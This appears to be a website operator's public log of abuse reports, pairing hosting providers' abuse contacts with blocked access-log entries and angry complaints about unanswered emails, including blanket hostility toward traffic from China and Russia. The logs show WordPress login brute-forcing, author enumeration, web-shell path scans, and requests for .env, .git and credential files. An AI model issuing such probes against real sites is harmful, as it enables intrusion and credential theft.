abuse@reg.ru – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
176.99.2.28 website*x.com – – [24/Aug/2025:03:07:12 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 20 „http://website*x.com“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0“
AS134420 – Chongqing Telecom – CHINA IS COMPLETE UNWANTED – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
anti-spam@chinatelecom.cn – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
113.249.101.169 website*x.com – – [24/Aug/2025:05:11:27 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Apache-HttpClient/4.5.2 (Java/1.8.0_161)“
113.249.101.169 website*x.com – – [24/Aug/2025:05:11:28 +0200] „GET /?author=1 HTTP/1.0“ 403 – „-“ „Apache-HttpClient/4.5.2 (Java/1.8.0_161)“
113.249.101.169 website*x.com – – [24/Aug/2025:05:12:09 +0200] „GET /?author=2 HTTP/1.0“ 403 – „-“ „Apache-HttpClient/4.5.2 (Java/1.8.0_161)“
113.249.101.169 website*x.com – – [24/Aug/2025:05:12:09 +0200] „GET /?author=3 HTTP/1.0“ 403 – „-“ „Apache-HttpClient/4.5.2 (Java/1.8.0_161)“
113.249.101.169 website*x.com – – [24/Aug/2025:05:12:09 +0200] „GET /?author=4 HTTP/1.0“ 403 – „-“ „Apache-HttpClient/4.5.2 (Java/1.8.0_161)“
113.249.101.169 website*x.com – – [24/Aug/2025:05:12:10 +0200] „GET /?author=5 HTTP/1.0“ 403 – „-“ „Apache-HttpClient/4.5.2 (Java/1.8.0_161)“
113.249.101.169 website*x.com – – [24/Aug/2025:05:12:10 +0200] „GET /?author=6 HTTP/1.0“ 403 – „-“ „Apache-HttpClient/4.5.2 (Java/1.8.0_161)“
113.249.101.169 website*x.com – – [24/Aug/2025:05:12:10 +0200] „GET /?author=7 HTTP/1.0“ 403 – „-“ „Apache-HttpClient/4.5.2 (Java/1.8.0_161)“
113.249.101.169 website*x.com – – [24/Aug/2025:05:12:11 +0200] „GET /?author=8 HTTP/1.0“ 403 – „-“ „Apache-HttpClient/4.5.2 (Java/1.8.0_161)“
113.249.101.169 website*x.com – – [24/Aug/2025:05:12:11 +0200] „GET /?author=9 HTTP/1.0“ 403 – „-“ „Apache-HttpClient/4.5.2 (Java/1.8.0_161)“
113.249.101.169 website*x.com – – [24/Aug/2025:05:12:14 +0200] „GET /?author=10 HTTP/1.0“ 403 – „-“ „Apache-HttpClient/4.5.2 (Java/1.8.0_161)“
113.249.101.169 website*x.com – – [24/Aug/2025:05:12:14 +0200] „GET /?author=11 HTTP/1.0“ 403 – „-“ „Apache-HttpClient/4.5.2 (Java/1.8.0_161)“
113.249.101.169 website*x.com – – [24/Aug/2025:05:12:14 +0200] „GET /?author=12 HTTP/1.0“ 403 – „-“ „Apache-HttpClient/4.5.2 (Java/1.8.0_161)“
113.249.101.169 website*x.com – – [24/Aug/2025:05:12:15 +0200] „GET /?author=13 HTTP/1.0“ 403 – „-“ „Apache-HttpClient/4.5.2 (Java/1.8.0_161)“
113.249.101.169 website*x.com – – [24/Aug/2025:05:12:15 +0200] „GET /?author=14 HTTP/1.0“ 403 – „-“ „Apache-HttpClient/4.5.2 (Java/1.8.0_161)“
113.249.101.169 website*x.com – – [24/Aug/2025:05:12:15 +0200] „GET /?author=15 HTTP/1.0“ 403 – „-“ „Apache-HttpClient/4.5.2 (Java/1.8.0_161)“
113.249.101.169 website*x.com – – [24/Aug/2025:05:12:16 +0200] „GET /?author=16 HTTP/1.0“ 403 – „-“ „Apache-HttpClient/4.5.2 (Java/1.8.0_161)“
113.249.101.169 website*x.com – – [24/Aug/2025:05:12:16 +0200] „GET /?author=17 HTTP/1.0“ 403 – „-“ „Apache-HttpClient/4.5.2 (Java/1.8.0_161)“
113.249.101.169 website*x.com – – [24/Aug/2025:05:12:16 +0200] „GET /?author=18 HTTP/1.0“ 403 – „-“ „Apache-HttpClient/4.5.2 (Java/1.8.0_161)“
113.249.101.169 website*x.com – – [24/Aug/2025:05:12:17 +0200] „GET /?author=19 HTTP/1.0“ 403 – „-“ „Apache-HttpClient/4.5.2 (Java/1.8.0_161)“
113.249.101.169 website*x.com – – [24/Aug/2025:05:12:17 +0200] „GET /?author=20 HTTP/1.0“ 403 – „-“ „Apache-HttpClient/4.5.2 (Java/1.8.0_161)“

MAIL NR. 14 TODAY!
abuse@worldhost.group,domain-abuse@dreamhost.com,abuse@ovh.net, abuse@ovh.us, abuse@ovh.ca
AS14670 – WHG Hosting Services Ltd – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@worldhost.group – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
192.250.231.36 website*x.de – – [24/Aug/2025:03:55:44 +0200] „HEAD /Wp HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
192.250.231.36 website*x.de – – [24/Aug/2025:03:59:05 +0200] „HEAD /WP HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
192.250.231.36 website*x.de – – [24/Aug/2025:04:01:55 +0200] „HEAD /old HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
192.250.231.36 website*x.de – – [24/Aug/2025:04:04:37 +0200] „HEAD /Old HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
192.250.231.36 website*x.de – – [24/Aug/2025:04:08:13 +0200] „HEAD /OLD HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
192.250.231.36 website*x.de – – [24/Aug/2025:04:12:15 +0200] „HEAD /oldsite HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
192.250.231.36 website*x.de – – [24/Aug/2025:04:15:42 +0200] „HEAD /new HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
192.250.231.36 website*x.de – – [24/Aug/2025:04:16:30 +0200] „HEAD /New HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
… and so on… and so on!!!
AS16276 – OVH SAS – HERE WITH 2 IP´S!!! COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ovh.net – ABUSE PER EMAIL IS STANDARD!!!
145.239.93.122 website*x.de – – [24/Aug/2025:06:41:18 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.de“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0“
145.239.93.122 website*x.de – – [24/Aug/2025:06:41:18 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „http://website*x.de“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36“
+
57.128.47.115 website*x.de – – [24/Aug/2025:09:05:08 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.de“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0“
57.128.47.115 website*x.de – – [24/Aug/2025:09:05:08 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „http://website*x.de“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36“
AS26347 – New Dream Network, LLC – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
domain-abuse@dreamhost.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
107.180.245.224 website*x.de – – [24/Aug/2025:07:02:05 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.de“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36“
107.180.245.224 website*x.de – – [24/Aug/2025:07:02:06 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „http://website*x.de“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36“

MAIL NR. 15 TODAY!
abuse@extentit.com,abuse@web-hosting.net.my,abuse@turkcell.com.tr
AS153528 – ExtentIT Solution Limited – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@extentit.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
161.248.201.171 website*x.de – – [24/Aug/2025:02:57:10 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.de“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0“
161.248.201.171 website*x.de – – [24/Aug/2025:02:57:11 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „http://website*x.de“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0“
AS55720 – Gigabit Hosting Sdn Bhd – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@web-hosting.net.my
103.27.74.204 website*x.de – – [24/Aug/2025:03:18:39 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.de“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62“
103.27.74.204 website*x.de – – [24/Aug/2025:03:18:40 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „http://website*x.de“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36“
AS34984 – Superonline Iletisim Hizmetleri A.S. – IS NOW ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@turkcell.com.tr
217.131.14.13 website*x.de – – [24/Aug/2025:03:40:12 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 – „http://website*x.de“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14“

MAIL NR. 16 TODAY!
abuse@linode.com,ip-admin@akamai.com,abuse@ovh.net, abuse@ovh.us, abuse@ovh.ca,abuse@ipxo.com, abuse@contabo.de, noc@contabo.de, sascha.wintz@contabo.de
AS63949 – Akamai Connected Cloud – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@linode.com,ip-admin@akamai.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
2600:3c01::f03c:94ff:feb4:2878 website*x.de – – [24/Aug/2025:05:06:46 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.de“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0“
2600:3c01::f03c:94ff:feb4:2878 website*x.de – – [24/Aug/2025:05:06:46 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „http://website*x.de“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203“
AS16276 – OVH SAS – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ovh.net – ABUSE PER EMAIL IS STANDARD!!!
51.91.161.103 website*x.de – – [24/Aug/2025:05:28:15 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.de“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36“
51.91.161.103 website*x.de – – [24/Aug/2025:05:28:15 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „http://website*x.de“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5“
AS40021 – Contabo Inc. – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@contabo.de – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
157.173.200.105 website*x.de – – [24/Aug/2025:06:10:02 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.de“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36“
157.173.200.105 website*x.de – – [24/Aug/2025:06:10:02 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „http://website*x.de“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15“

MAIL NR. 17 TODAY!
abuse@jimathosting.com
AS136727 – Jimat Technology Solution
abuse@jimathosting.com
103.191.76.181 website*x.de – – [24/Aug/2025:06:52:36 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.de“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36“
103.191.76.181 website*x.de – – [24/Aug/2025:06:52:36 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „http://website*x.de“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62“

MAIL NR. 18 TODAY!
abuse@microsoft.com, msftcs@microsoft.com, cert@microsoft.com,abuse@donweb.com,abuse@asiatech.ir
AS8075 – Microsoft Corporation – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
74.176.53.217 website*x.com – – [24/Aug/2025:07:15:26 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „-“
74.176.53.217 website*x.com – – [24/Aug/2025:07:15:26 +0200] „GET /file2.php HTTP/1.0“ 302 – „-“ „-“
74.176.53.217 website*x.com – – [24/Aug/2025:07:15:41 +0200] „GET /file3.php HTTP/1.0“ 302 – „-“ „-“
74.176.53.217 website*x.com – – [24/Aug/2025:07:15:56 +0200] „GET /file4.php HTTP/1.0“ 302 – „-“ „-“
74.176.53.217 website*x.com – – [24/Aug/2025:07:16:11 +0200] „GET /file5.php HTTP/1.0“ 302 – „-“ „-“
74.176.53.217 website*x.com – – [24/Aug/2025:07:16:26 +0200] „GET /file6.php HTTP/1.0“ 302 – „-“ „-“
74.176.53.217 website*x.com – – [24/Aug/2025:07:16:41 +0200] „GET /file7.php HTTP/1.0“ 302 – „-“ „-“
74.176.53.217 website*x.com – – [24/Aug/2025:07:16:56 +0200] „GET /file8.php HTTP/1.0“ 302 – „-“ „-“
74.176.53.217 website*x.com – – [24/Aug/2025:07:17:11 +0200] „GET /file9.php HTTP/1.0“ 302 – „-“ „-“
74.176.53.217 website*x.com – – [24/Aug/2025:07:17:26 +0200] „GET /file.php HTTP/1.0“ 302 – „-“ „-“
74.176.53.217 website*x.com – – [24/Aug/2025:07:17:41 +0200] „GET /.trash7309/index.php HTTP/1.0“ 403 – „-“ „-“
74.176.53.217 website*x.com – – [24/Aug/2025:07:17:41 +0200] „GET /bless.php HTTP/1.0“ 403 – „-“ „-“
74.176.53.217 website*x.com – – [24/Aug/2025:07:17:41 +0200] „GET /law.php HTTP/1.0“ 302 – „-“ „-“
74.176.53.217 website*x.com – – [24/Aug/2025:07:17:56 +0200] „GET /lock360.php HTTP/1.0“ 302 – „-“ „-“
74.176.53.217 website*x.com – – [24/Aug/2025:07:18:11 +0200] „GET /wp-admin/wp-conflg.php HTTP/1.0“ 302 – „-“ „-“
74.176.53.217 website*x.com – – [24/Aug/2025:07:18:26 +0200] „GET /404.php HTTP/1.0“ 302 – „-“ „-“
74.176.53.217 website*x.com – – [24/Aug/2025:07:18:41 +0200] „GET /wp-conflg.php HTTP/1.0“ 302 – „-“ „-“
74.176.53.217 website*x.com – – [24/Aug/2025:07:18:46 +0200] „GET /.trash7309/index.php HTTP/1.0“ 403 – „-“ „-“
74.176.53.217 website*x.com – – [24/Aug/2025:07:18:47 +0200] „GET /wp-admin/file.php HTTP/1.0“ 302 – „-“ „-“
74.176.53.217 website*x.com – – [24/Aug/2025:07:19:02 +0200] „GET /wp-content/wp-conflg.php HTTP/1.0“ 403 – „-“ „-“
AS27823 – Dattatec.com – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@donweb.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
2800:6c0:5::afb website*x.com – – [24/Aug/2025:09:05:16 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15“
2800:6c0:5::afb website*x.com – – [24/Aug/2025:09:05:17 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“
AS43754 – Asiatech Data Transmission company – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@asiatech.ir – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
37.156.147.221 website*x.com – – [24/Aug/2025:10:24:48 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36“
37.156.147.221 website*x.com – – [24/Aug/2025:10:24:49 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15“

MAIL NR. 19 TODAY!
domain-abuse@dreamhost.com,abuse@best-hoster.ru,abuse@scaleway.com
AS26347 – New Dream Network, LLC – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
domain-abuse@dreamhost.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
107.180.224.51 website*x.de – – [24/Aug/2025:07:13:18 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.de“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68“
107.180.224.51 website*x.de – – [24/Aug/2025:07:13:18 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „http://website*x.de“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203“
AS49693 – Best-Hoster Group Co. Ltd. – RUSSIA IS VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@best-hoster.ru
91.219.194.13 website*x.de – – [24/Aug/2025:07:34:08 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.de“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14“
91.219.194.13 website*x.de – – [24/Aug/2025:07:34:08 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „http://website*x.de“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“
AS12876 – SCALEWAY S.A.S. – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@scaleway.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
51.159.28.204 website*x.de – – [24/Aug/2025:07:54:14 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.de“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14“
51.159.28.204 website*x.de – – [24/Aug/2025:07:54:15 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „http://website*x.de“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36“

MAIL NR. 20 TODAY!
abuse@microsoft.com, msftcs@microsoft.com, cert@microsoft.com,bucklog@proton.me,report@abuseradar.com
AS8075 – Microsoft Corporation – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
40.119.198.71 website*x.com – – [24/Aug/2025:16:05:51 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „-“
40.119.198.71 website*x.com – – [24/Aug/2025:16:05:52 +0200] „GET /footer.php HTTP/1.0“ 302 – „-“ „-“
40.119.198.71 website*x.com – – [24/Aug/2025:16:06:07 +0200] „GET /moon1.php HTTP/1.0“ 302 – „-“ „-“
40.119.198.71 website*x.com – – [24/Aug/2025:16:06:22 +0200] „GET /akc.php HTTP/1.0“ 302 – „-“ „-“
40.119.198.71 website*x.com – – [24/Aug/2025:16:06:37 +0200] „GET /wsa.php HTTP/1.0“ 302 – „-“ „-“
40.119.198.71 website*x.com – – [24/Aug/2025:16:06:52 +0200] „GET /acp.php HTTP/1.0“ 302 – „-“ „-“
40.119.198.71 website*x.com – – [24/Aug/2025:16:06:57 +0200] „GET /aaa.php HTTP/1.0“ 302 – „-“ „-“
40.119.198.71 website*x.com – – [24/Aug/2025:16:06:57 +0200] „GET /wordfence-waf.php HTTP/1.0“ 302 – „-“ „-“
40.119.198.71 website*x.com – – [24/Aug/2025:16:07:12 +0200] „GET /as.php HTTP/1.0“ 302 – „-“ „-“
40.119.198.71 website*x.com – – [24/Aug/2025:16:07:27 +0200] „GET /hehe.php HTTP/1.0“ 302 – „-“ „-“
+
52.230.122.249 website*x.com – – [24/Aug/2025:20:59:36 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „-“
52.230.122.249 website*x.com – – [24/Aug/2025:20:59:36 +0200] „GET /wp.php HTTP/1.0“ 302 – „-“ „-“
52.230.122.249 website*x.com – – [24/Aug/2025:20:59:36 +0200] „GET /youtube.php HTTP/1.0“ 302 – „-“ „-“
52.230.122.249 website*x.com – – [24/Aug/2025:20:59:36 +0200] „GET /we.php HTTP/1.0“ 302 – „-“ „-“
52.230.122.249 website*x.com – – [24/Aug/2025:20:59:36 +0200] „GET /wp-ori.php HTTP/1.0“ 302 – „-“ „-“
52.230.122.249 website*x.com – – [24/Aug/2025:20:59:51 +0200] „GET /.well-known/xd.php HTTP/1.0“ 403 – „-“ „-“
52.230.122.249 website*x.com – – [24/Aug/2025:20:59:51 +0200] „GET /wp-includes/widgets/man.php7 HTTP/1.0“ 403 – „-“ „-“
52.230.122.249 website*x.com – – [24/Aug/2025:20:59:52 +0200] „GET /wp-includes/widgets/ol.php7 HTTP/1.0“ 403 – „-“ „-“
52.230.122.249 website*x.com – – [24/Aug/2025:20:59:52 +0200] „GET /wp-includes/pomo/man.php7 HTTP/1.0“ 403 – „-“ „-“
52.230.122.249 website*x.com – – [24/Aug/2025:20:59:52 +0200] „GET /index/editmode.php HTTP/1.0“ 403 – „-“ „-“
52.230.122.249 website*x.com – – [24/Aug/2025:20:59:52 +0200] „GET /index/b012.php HTTP/1.0“ 403 – „-“ „-“
52.230.122.249 website*x.com – – [24/Aug/2025:20:59:52 +0200] „GET /test2.php HTTP/1.0“ 302 – „-“ „-“
52.230.122.249 website*x.com – – [24/Aug/2025:21:00:07 +0200] „GET /xex.php HTTP/1.0“ 302 – „-“ „-“
AS211590 – Bucklog SARL – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
bucklog@proton.me – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
185.177.72.29 website*x.com – – [24/Aug/2025:18:36:51 +0200] „GET /.git/HEAD HTTP/1.0“ 403 – „-“ „-“
185.177.72.29 website*x.com – – [24/Aug/2025:18:36:51 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.29 website*x.com – – [24/Aug/2025:18:36:51 +0200] „GET /.env.bak HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.29 website*x.com – – [24/Aug/2025:18:36:51 +0200] „GET /.env.local HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.29 website*x.com – – [24/Aug/2025:18:36:51 +0200] „GET /.env.production HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.29 website*x.com – – [24/Aug/2025:18:36:51 +0200] „GET /.env.dev HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.29 website*x.com – – [24/Aug/2025:18:36:51 +0200] „GET /config/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.29 website*x.com – – [24/Aug/2025:18:36:51 +0200] „GET /docker/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.29 website*x.com – – [24/Aug/2025:18:36:51 +0200] „GET /api/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.29 website*x.com – – [24/Aug/2025:18:36:51 +0200] „GET /api/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.29 website*x.com – – [24/Aug/2025:18:36:51 +0200] „GET /api/settings.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.29 website*x.com – – [24/Aug/2025:18:36:51 +0200] „GET /api/keys HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.29 website*x.com – – [24/Aug/2025:18:36:51 +0200] „GET /api/credentials HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
